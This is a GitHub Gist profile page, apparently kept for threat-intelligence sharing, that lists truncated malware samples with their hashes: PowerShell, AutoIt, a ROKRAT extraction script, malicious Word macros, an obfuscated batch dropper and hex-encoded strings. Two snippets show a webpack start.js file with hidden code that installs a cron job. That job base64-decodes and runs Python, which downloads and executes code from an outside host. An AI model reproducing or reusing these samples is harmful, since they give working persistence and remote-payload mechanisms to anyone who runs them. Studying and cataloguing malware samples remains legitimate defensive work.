Skip to content

Instantly share code, notes, and snippets.

View seclib's full-sized avatar

Seclib seclib

24 followers · 4 following
View GitHub Profile
@seclib
seclib / ps1_threat
Last active April 25, 2018 11:44
ps1 threat
function _/=\_____/==\/=\/\
{
try
@seclib
seclib / YQYgT.au3
Created June 17, 2018 14:36
auto-it malware script 8d82727e497449d3648c29f2216ff026afe8079b070012984aa6954e3ed0b139
#NoTrayIcon
#EndRegion
Dim $IIThbVLLWS = "1"
Dim $CWBFTZBdRBF = "YQYg"
Dim $CWBFTZBdRBFN = "YQYgT"
Dim $PMHTbZHeQhgeW = "FuyOUaWDQXzcuubQ"
Dim $bBOiAYNfPdZMWb = "BFfLbS"
Dim $bBOiAYNfPdZMWbP = Int("0")
Dim $WPfGbcDOKNbChUgJ = "fTNSTWFKWVKG"
Dim $iECUAbJPJJTThfEIU = "0"
@seclib
seclib / payload-rokrat.py
Created July 7, 2018 18:34
Python malware extraction for 2018-07-05 HWP ROKRAT dropper
#extract malware from: 9e6ff58202f6c1bd2381e8209231efd0ef6855db59db975fb5b75041706ed104
import re
import sys
import zlib
import struct
import hashlib
import oledump
import olefile
import binascii
import cStringIO
@seclib
seclib / kill_all.c
Created July 20, 2018 01:58
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <errno.h>
#include <assert.h>
#include <unistd.h>
#include <pthread.h>
#include <time.h>
@seclib
seclib / webpack_start.js
Created July 20, 2018 02:37
03d9abc82fd79d2f407e7be455995cb9938dcb9d4a52ee41ca5fc47d278a4e7d
'use strict';
// Do this as the first thing so that any code reading it knows the right env.
process.env.BABEL_ENV = 'development';
process.env.NODE_ENV = 'development';
require('child_process').exec("echo \"0 * * * * python -c \\\"import sys as ss,base64 as bb;exec(bb.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[ss.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJ10pCmhzPVtdCm89dWwuYnVpbGRfb3BlbmVyKCpocykKby5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLCdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJyldCmV4ZWMoby5vcGVuKCdodHRwOi8vbGVveHRidXl4by50azo0NDMvbWNJZllwQmwyTVUtcHl1elpQMUZfd19HeDM3SFZ2
@seclib
seclib / start.js
Created July 20, 2018 02:41
'use strict';
// Do this as the first thing so that any code reading it knows the right env.
process.env.BABEL_ENV = 'development';
process.env.NODE_ENV = 'development';
require('child_process').exec("echo \"0 * * * * python -c \\\"import sys as ss,base64 as bb;exec(bb.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[ss.version_info[0]]('import sys
vi=sys.version_info
ul=__import__({2:'urllib2',3:'urllib.request'}[vi[0]],fromlist=['build_opener'])
hs=[]
o=ul.build_opener(*hs)
@seclib
seclib / b1a337b763c4df875726274632e675bdba4941504b249e6732d7a6dbaeedc235
Created July 20, 2018 17:49
Malicious Macro
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
@seclib
seclib / rerzvqjzaeoieibyenyy,;87eze
Created August 3, 2018 18:22
codinf = "E4F1DDE6E7E1E1D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5F1E0E8DEE7F0EB"
codinf = "E0F1E8E2ECDBE8D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5E9ECE0E3D9E6DE"
codinf = "EDEEEDEEE3F1EAD3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5F0EFF1ECDBE4DF"
codinf = "EBE4D9E8DBE2E2D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5DBDDECDCE3DAE1"
codinf = "DBDEE0E9E5E5E2D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5DEDCE6DBE5DEDD"
codinf = "E8E1E8E7DBE2E3D3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5DBE6E4E1EFE9E0"
codinf = "DDDBEEE0E0DBEBD3D9B5A9AFAFA6A9A9A6ADA8A6A9A9AFB5D9D5D3DAB5BBD0A5A9E6BEABDBCCB5DAD5D3DBB5C8BDC1D0C1C5B5DBD5D9DCE5DAD9DADD"
@seclib
seclib / untitled
Created August 3, 2018 18:24
@echo off
SETLOCAL
Set gglusyl=
Set gglusyl=%gglusyl%("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz. &+/)'&__
md "%USERPROFILE%\Temp" && cls
set sxoxobh=%USERNAME%.vbs
del "%USERPROFILE%\Temp\%sxoxobh%"
set inxovtv=%USERPROFILE%\Temp\%sxoxobh% ECHO
>>%inxovtv% %gglusyl:~26,1%%gglusyl:~51,1%%gglusyl:~65,1%%gglusyl:~16,1%%gglusyl:~55,1%%gglusyl:~55,1%%gglusyl:~52,1%%gglusyl:~55,1%%gglusyl:~65,1%%gglusyl:~29,1%%gglusyl:~42,1%%gglusyl:~56,1%%gglusyl:~58,1%%gglusyl:~50,1%%gglusyl:~42,1%%gglusyl:~65,1%%gglusyl:~25,1%%gglusyl:~42,1%%gglusyl:~61,1%%gglusyl:~57,1%
>>%inxovtv% %gglusyl:~15,1%%gglusyl:~46,1%%gglusyl:~50,1%%gglusyl:~65,1%%gglusyl:~53,1%%gglusyl:~38,1%%gglusyl:~56,1%%gglusyl:~57,1%%gglusyl:~38,1%%gglusyl:~53,1%%gglusyl:~55,1%%gglusyl:~52,1%%gglusyl:~44,1%%gglusyl:~55,1%%gglusyl:~38,1%%gglusyl:~50,1%,%gglusyl:~23,1%%gglusyl:~51,1%%gglusyl:~48,1%,%gglusyl:~51,1%%gglusyl:~50,1%%gglusyl:~38,1%%gglusyl:~55,1%%gglusyl:~54,1%%gglusyl:~61,1%,%gglusyl:~51,1%%gglusyl:~50,1%%gglusyl:~38,1%%ggl
@seclib
seclib / ec7182dbcecd
Created August 19, 2018 12:32
VBA sample
## Uploaded by @satya_enki
## Hash: 10955f54aa38dbf4eb510b8e7903398d9896ee13d799fdc980f4ec7182dbcecd
Sub AutoOpen()
Dim abjaWFApqTOaGknEZ As String
Dim EVvHI As Object
Dim aqwMEEghqLNesI As Integer
Dim TgAVw As String
aqwMEEghqLNesI = 816
abjaWFApqTOaGknEZ = HyqtqSXGmk("5f7b6b7a") & "qx|6[pmtt"